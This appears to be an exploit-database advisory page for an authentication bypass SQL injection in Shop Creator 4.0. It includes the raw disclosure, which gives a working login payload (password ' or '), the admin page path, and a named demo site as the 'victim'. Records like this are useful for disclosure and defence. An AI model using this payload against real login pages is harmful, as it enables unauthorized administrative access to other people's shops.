Auth Bypass SQL Injection Vulnerability

vendor:

Shop Creator

by:

Pouya_Server

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Shop Creator

Affected Version From: 4.0

Affected Version To: 4.0

Patch Exists: N/A

Related CWE: N/A

CPE: a:etoshop:shop_creator:4.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

N/A

Auth Bypass SQL Injection Vulnerability

An authentication bypass vulnerability exists in Shop Creator 4.0 due to improper validation of user-supplied input. An attacker can exploit this vulnerability to bypass authentication and gain access to the admin page. To exploit this vulnerability, an attacker can use the username 'pouya' and the password ' or '.

Mitigation:

Input validation should be performed to ensure that untrusted data is not used to bypass authentication.

Source

Exploit-DB raw data:

#########################################################
---------------------------------------------------------
Portal Name: Shop Creator
Version: 4.0
Vendor: http://www.etoshop.com
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Website: http://Pouya-Server.ir
Vulnerability : (Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------
#########################################################
[Auth Bypass]:
user: pouya
pass: ' or '
admin page : http://site.com/[path]/admin.asp
---------------------------------
Victem :
http://www.etoshop.com/demo/pcstore
---------------------------------------------------------
#########################################################